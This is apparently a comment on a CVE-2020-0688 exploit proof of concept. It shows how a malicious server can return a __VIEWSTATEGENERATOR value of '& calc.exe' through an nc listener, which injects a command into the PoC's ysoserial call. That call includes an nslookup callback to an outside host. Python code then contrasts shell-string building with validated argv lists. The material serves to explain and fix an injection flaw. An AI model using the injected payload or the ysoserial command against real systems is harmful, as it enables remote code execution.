cve-2020-0688
Yo dawg
I made a PoC for your PoC so I can pop shells while you pop shells:
echo '''HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: localhost
Cookie: ASP.NET_SessionId=test-sess-id Time
<html>id="__VIEWSTATEGENERATOR" value="& calc.exe"</html>
''' |sudo nc -l 80
Assuming you're running your PoC as python3 exploit.py -s http://localhost/ -u admin -p admin
and blindly running that, the output command becomes:
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "nslookup teasdas.myburpcollab.net" --validationalg="SHA1" --validationkey=& calc.exe --generator="B97B4E27" --viewstateuserkey=test-sess-id --isdebug --islegacy
which pops calc. I know this is totally outside the scope of this little PoC but I just got a kick out of it. Python has some really nice utils for shelling out while also escaping params:
https://docs.python.org/3/library/subprocess.html#subprocess.run
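The bug the comment above describes, as an added example that is not the PoC's own code: the `__VIEWSTATEGENERATOR` value is scraped from an HTTP response the target controls, so it is untrusted input, and pasting it into a command string that a shell later parses is command injection in the tool itself. The block below uses the response body and generator value from the comment as constructed input; `extract_generator`, `is_valid_generator`, `build_command_unsafe`, `build_command_safe`, `echo_argument` and the `VALIDATION_KEY_PLACEHOLDER` value are assumed names of mine, not names from exploit.py. It contrasts the string-with-shell pattern with an argv list passed to `subprocess.run` (the link above), plus an allow-list check that a generator is eight hex digits before it reaches any command line.

```python
import re
import subprocess
import sys

# Illustrative helpers, not the PoC's own code. Names below are assumptions.
GENERATOR_RE = re.compile(r'id="__VIEWSTATEGENERATOR"\s+value="([^"]*)"')
HEX8_RE = re.compile(r"^[0-9A-Fa-f]{8}$")

# Constructed response body, modelled on the one echoed through nc in the comment.
MALICIOUS_HTML = '<html>id="__VIEWSTATEGENERATOR" value="& calc.exe"</html>'
VALIDATION_KEY = "VALIDATION_KEY_PLACEHOLDER"  # placeholder, not a real key


def extract_generator(html: str) -> str:
    """Pull the __VIEWSTATEGENERATOR value out of the response body (untrusted)."""
    match = GENERATOR_RE.search(html)
    if match is None:
        raise ValueError("no __VIEWSTATEGENERATOR in response")
    return match.group(1)


def is_valid_generator(value: str) -> bool:
    """A genuine generator is eight hex digits, e.g. B97B4E27."""
    return HEX8_RE.match(value) is not None


def build_command_unsafe(generator: str, session_id: str, key: str, cmd: str) -> str:
    """The shape that gets exploited: one string later handed to a shell
    (os.system / shell=True), so metacharacters in `generator` become shell syntax."""
    return (
        f'ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "{cmd}" '
        f'--validationalg="SHA1" --validationkey={key} --generator="{generator}" '
        f'--viewstateuserkey={session_id} --isdebug --islegacy'
    )


def build_command_safe(generator: str, session_id: str, key: str, cmd: str) -> list:
    """Validate the server-supplied value, then build an argv list. With the
    default shell=False each element reaches the program as one argument and
    is never re-parsed by a shell."""
    if not is_valid_generator(generator):
        raise ValueError(f"refusing suspicious __VIEWSTATEGENERATOR: {generator!r}")
    return [
        "ysoserial.exe", "-p", "ViewState", "-g", "TextFormattingRunProperties",
        "-c", cmd, "--validationalg=SHA1", f"--validationkey={key}",
        f"--generator={generator}", f"--viewstateuserkey={session_id}",
        "--isdebug", "--islegacy",
    ]


def echo_argument(value: str) -> str:
    """Show that an argv element arrives intact: a child Python prints its
    argv[1]. No shell is involved, so '& calc.exe' is plain text."""
    proc = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1])", value],
        capture_output=True, text=True, check=True,
    )
    return proc.stdout.rstrip("\n")


if __name__ == "__main__":
    gen = extract_generator(MALICIOUS_HTML)
    print("unsafe string:", build_command_unsafe(gen, "test-sess-id", VALIDATION_KEY, "whoami"))
    print("argv element as received:", echo_argument(gen))
    try:
        build_command_safe(gen, "test-sess-id", VALIDATION_KEY, "whoami")
    except ValueError as exc:
        print("safe builder rejected it:", exc)
```

Two layers matter here: the argv list stops the shell from ever seeing the value, and the hex allow-list stops a hostile server from feeding arbitrary bytes to ysoserial's own argument parser even when no shell is involved. The same treatment applies to the session id taken from the Set-Cookie header.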